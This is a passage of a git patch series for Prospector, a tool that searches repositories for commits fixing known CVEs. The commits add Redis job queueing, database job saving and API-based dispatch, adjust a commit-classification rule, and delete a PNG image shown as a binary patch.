params = { + "vulnerability_id": vuln_id, + "repository_url": repo_url, + "version_interval": v_int, + "use_backend": True, + "backend_address": backend, + "git_cache": "/tmp/gitcache", + "limit_candidates": 2000, + "use_llm_repository_url": False, + "enabled_rules": config.enabled_rules, + } + try: + results, advisory_record = prospector(**params) + generate_report( + results, + advisory_record, + "html", + f"data_sources/reports/{vuln_id}_{job_id}", + ) + status = "finished" + results = f"data_sources/reports/{vuln_id}_{job_id}" + except Exception as e: + status = "failed" + results = None + logger.error(f"job failed during execution: {e}") + finally: + end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") + print(job_id, status, end_time, results) + data = {"status": status, "finished_at": end_time, "results": results} + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + return f"data_sources/reports/{vuln_id}_{job_id}" + + +def create_prospector_job(vuln_id, repo, version, at_front=False): + with Connection(redis.from_url(redis_url)): + queue = Queue(default_timeout=800) + if at_front: + job = queue.enqueue( + run_prospector, args=(vuln_id, repo, version), at_front=True + ) + else: + job = queue.enqueue(run_prospector, args=(vuln_id, repo, version)) + + return job + + +def connect_to_db(): + db = PostgresBackendDB( + config.database.user, + config.database.password, + config.database.host, + config.database.port, + config.database.dbname, + ) + db.connect() + return db + + +async def enqueue_jobs(): + db = connect_to_db() + processed_vulns = db.get_processed_vulns_not_in_job() + print(processed_vulns) + created_by = "Auto" + for processed_vuln in processed_vulns: + pv_id = processed_vuln["_id"] + pv_repository = processed_vuln["repository"] + pv_versions = processed_vuln["versions"] + v_vuln_id = processed_vuln["vuln_id"] + + try: + job = create_prospector_job(v_vuln_id, pv_repository, pv_versions) + except Exception: + logger.error( + "error while creating automatically the jobs", exc_info=True + ) + + try: + db.save_job( + job.get_id(), + pv_id, + job.args, + job.created_at, + job.started_at, + job.ended_at, + job.result, + created_by, + job.get_status(refresh=True), + ) + except Exception: + logger.error( + "error while saving automatically the jobs", exc_info=True + ) + + db.disconnect() diff --git a/prospector/evaluation/create_jobs.py b/prospector/evaluation/create_jobs.py new file mode 100644 index 000000000..e036133f2 --- /dev/null +++ b/prospector/evaluation/create_jobs.py @@ -0,0 +1,160 @@ +import json +import sys +import time +from datetime import datetime + +import redis +import requests +from rq import Connection, Queue, get_current_job + +from backenddb.postgres import PostgresBackendDB +from core.prospector import prospector +from core.report import generate_report +from llm.llm_service import LLMService +from log.logger import logger +from util.config_parser import parse_config_file + +from evaluation.utils import ( + PROSPECTOR_REPORTS_PATH_CONTAINER, + logger, + config, +) + +prospector_config = config.prospector_settings + + +async def enqueue_jobs(): + db = connect_to_db() + processed_vulns = db.get_processed_vulns_not_in_job() + print(processed_vulns) + created_by = "Auto" + for processed_vuln in processed_vulns: + pv_id = processed_vuln["_id"] + pv_repository = processed_vuln["repository"] + pv_versions = processed_vuln["versions"] + v_vuln_id = processed_vuln["vuln_id"] + + try: + job = _create_prospector_job(v_vuln_id, pv_repository, pv_versions) + except Exception: + logger.error( + "error while creating automatically the jobs", exc_info=True + ) + + try: + db.save_job( + job.get_id(), + pv_id, + job.args, + job.created_at, + job.started_at, + job.ended_at, + job.result, + created_by, + job.get_status(refresh=True), + ) + except Exception: + logger.error( + "error while saving automatically the jobs", exc_info=True + ) + + db.disconnect() + + +def _create_prospector_job(vuln_id, repo, version, at_front=False): + with Connection(redis.from_url(prospector_config.redis_url)): + queue = Queue(default_timeout=800) + if at_front: + job = queue.enqueue( + _run_prospector_and_generate_report, + args=(vuln_id, repo, version), + at_front=True, + ) + else: + job = queue.enqueue( + _run_prospector_and_generate_report, + args=(vuln_id, repo, version), + ) + + return job + + +def _run_prospector_and_generate_report(vuln_id, repo_url, v_int): + job = get_current_job() + job_id = job.get_id() + url = f"{prospector_config.backend}/jobs/{job_id}" + data = { + "status": job.get_status(), + "started_at": job.started_at.isoformat(), + } + + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + params = { + "vulnerability_id": vuln_id, + "repository_url": repo_url, + "version_interval": v_int, + "use_backend": True, + "backend_address": prospector_config.backend, + "git_cache": "/tmp/gitcache", + "limit_candidates": 2000, + "use_llm_repository_url": False, + "enabled_rules": prospector_config.enabled_rules, + } + + try: + LLMService(prospector_config.llm_service) + except Exception as e: + logger.error(f"LLM Service could not be instantiated: {e}") + raise e + + try: + results, advisory_record = prospector(**params) + generate_report( + results, + advisory_record, + "json", + f"{PROSPECTOR_REPORTS_PATH_CONTAINER}{vuln_id}.json", + prospector_params=params, + ) + status = "finished" + results = f"data_sources/reports/{vuln_id}_{job_id}" + except Exception as e: + status = "failed" + results = None + logger.error(f"job failed during execution: {e}") + finally: + end_time = datetime.now().strftime("%Y-%m-%dT%H:%M:%S.%f") + print(job_id, status, end_time, results) + data = {"status": status, "finished_at": end_time, "results": results} + try: + response = requests.put(url, json=data) + if response.status_code == 200: + response_object = response.json() + print(response_object) + else: + print("Error:", response.status_code) + except requests.exceptions.RequestException as e: + print("Error:", e) + + return f"data_sources/reports/{vuln_id}_{job_id}" + + +def connect_to_db(): + db = PostgresBackendDB( + prospector_config.database.user, + prospector_config.database.password, + prospector_config.database.host, + prospector_config.database.port, + prospector_config.database.dbname, + ) + db.connect() + return db diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index af93b28b6..d28c24b24 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -1,5 +1,6 @@ # flake8: noqa import argparse +import asyncio import os import signal import sys @@ -18,8 +19,10 @@ overall_execution_time, ) from evaluation.dispatch_jobs import ( + dispatch_jobs_with_api, dispatch_prospector_jobs, empty_queue, + start, ) @@ -106,18 +109,20 @@ def parse_cli_args(args): return parser.parse_args() -def main(argv): +async def main(argv): args = parse_cli_args(argv) # Run Prospector containerised if args.execute and not args.analyze: dispatch_prospector_jobs(args.input, args.cve) + # await dispatch_jobs_with_api(args.input, args.cve) + # start() elif args.analyze and not args.execute: # analysis of execution statistics in report if args.stats: - analyse_statistics(args.input) - # overall_execution_time(args.input) + # analyse_statistics(args.input) + overall_execution_time(args.input) # commit_classification_time(args.input) # candidates_execution_time(args.input) @@ -183,4 +188,4 @@ def sig_handler(signum, frame): if __name__ == "__main__": signal.signal(signal.SIGINT, sig_handler) - main(sys.argv[1:]) + asyncio.run(main(sys.argv[1:])) From 64eeb0186621eb457f43200db7717370873355e3 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 28 Aug 2024 13:05:31 +0000 Subject: [PATCH 123/130] [ADD] code to use the API to enqueue jobs --- prospector/evaluation/dispatch_jobs.py | 37 ++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 06ccec810..533d14f84 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -6,6 +6,16 @@ from core.prospector import prospector from core.report import generate_report +from data_sources.nvd.filter_entries import ( + process_entries, + retrieve_vulns, + save_vuln_to_db, +) +from data_sources.nvd.job_creation import ( + create_prospector_job, + run_prospector, +) +from evaluation.create_jobs import _create_prospector_job, enqueue_jobs from evaluation.utils import ( INPUT_DATA_PATH, PROSPECTOR_REPORTS_PATH_HOST, @@ -127,3 +137,30 @@ def empty_queue(): queue.empty() print("Emptied the queue.") + + +async def dispatch_jobs_with_api(filename: str, selected_cves: str): + """Dispatches jobs to the queue.""" + # Retrieve CVE data + cve_data = await retrieve_vulns(10) + + # Save raw CVE data to the database + save_vuln_to_db(cve_data) + + # Process and filter the new CVE data and save results to the database + processed_vulns = await process_entries() + + print("CVEs ready to be enqueued.") + + # Enqueue jobs for new processed CVEs + await enqueue_jobs() + + +def start(): + # vuln_id = "CVE-2018-14840" + # repo_url = "https://github.com/intelliants/subrion" + # v_int = "4.2.1:4.2.2" + vuln_id = "CVE-2010-0156" + repo_url = "https://github.com/puppetlabs/puppet" + v_int = "0.25.1:0.25.2" + _create_prospector_job(vuln_id, repo_url, v_int) From 36e9318eb56f72b0c20c5b46ff9e2db9e6456a31 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 28 Aug 2024 13:06:15 +0000 Subject: [PATCH 124/130] [FIX] temporary fix to not use database for cc when use_backend set to false --- prospector/rules/rules.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/prospector/rules/rules.py b/prospector/rules/rules.py index cdc1d8d64..aee22fbdb 100644 --- a/prospector/rules/rules.py +++ b/prospector/rules/rules.py @@ -452,10 +452,10 @@ def apply( r.raise_for_status() commit_data = r.json()[0] - is_security_relevant = commit_data.get("security_relevant") - if is_security_relevant is not None: - candidate.security_relevant = is_security_relevant - return is_security_relevant + # is_security_relevant = commit_data.get("security_relevant") + # if is_security_relevant is not None: + # candidate.security_relevant = is_security_relevant + # return is_security_relevant candidate.security_relevant = LLMService().classify_commit( candidate.diff, candidate.repository, candidate.message From 579a622ff197a117bbac8aba5c42ce0b099a789e Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 28 Aug 2024 13:21:55 +0000 Subject: [PATCH 125/130] [DOC] cleans up unimportant files --- .../images/summary_execution_table.png | Bin 71830 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 prospector/evaluation/images/summary_execution_table.png diff --git a/prospector/evaluation/images/summary_execution_table.png b/prospector/evaluation/images/summary_execution_table.png deleted file mode 100644 index 55ba10679bb03e34901933e210cfd1a6297591ac..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 71830 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 